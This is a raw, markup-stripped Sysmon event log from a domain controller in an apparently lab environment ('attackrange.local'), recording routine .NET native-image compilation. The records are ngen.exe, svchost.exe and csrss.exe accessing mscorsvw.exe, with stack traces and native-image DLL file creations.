13:51:05.257{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9249-6005-4804-00000000A301}4852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:05.195{59A5CD1D-9248-6005-4704-00000000A301}4616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1208-0\System.IO.Log.dll2021-01-18 13:51:05.195 10341000x80000000000000008586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:06.788{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924A-6005-4E04-00000000A301}4636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:06.788{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-924A-6005-4E04-00000000A301}4636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:06.788{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924A-6005-4E04-00000000A301}4636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:06.710{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924A-6005-4D04-00000000A301}3244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:06.695{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-924A-6005-4D04-00000000A301}3244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:06.695{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924A-6005-4D04-00000000A301}3244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:06.617{59A5CD1D-924A-6005-4C04-00000000A301}4708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1264-0\System.Messaging.dll2021-01-18 13:51:06.617 10341000x80000000000000008579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:06.257{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924A-6005-4C04-00000000A301}4708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:06.242{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-924A-6005-4C04-00000000A301}4708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:06.242{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924A-6005-4C04-00000000A301}4708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:06.070{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924A-6005-4B04-00000000A301}4592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:06.054{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-924A-6005-4B04-00000000A301}4592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:06.054{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924A-6005-4B04-00000000A301}4592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:05.992{59A5CD1D-9249-6005-4A04-00000000A301}4480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1180-0\System.Management.Instrumentation.dll2021-01-18 13:51:05.992 10341000x80000000000000008607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:07.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924B-6005-5404-00000000A301}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:07.601{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-924B-6005-5404-00000000A301}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:07.601{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924B-6005-5404-00000000A301}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:07.538{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924B-6005-5304-00000000A301}2828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:07.523{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-924B-6005-5304-00000000A301}2828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:07.523{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924B-6005-5304-00000000A301}2828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:07.476{59A5CD1D-924B-6005-5204-00000000A301}2352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\930-0\System.Numerics.dll2021-01-18 13:51:07.476 10341000x80000000000000008600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:07.335{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924B-6005-5204-00000000A301}2352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:07.320{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-924B-6005-5204-00000000A301}2352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:07.320{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924B-6005-5204-00000000A301}2352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL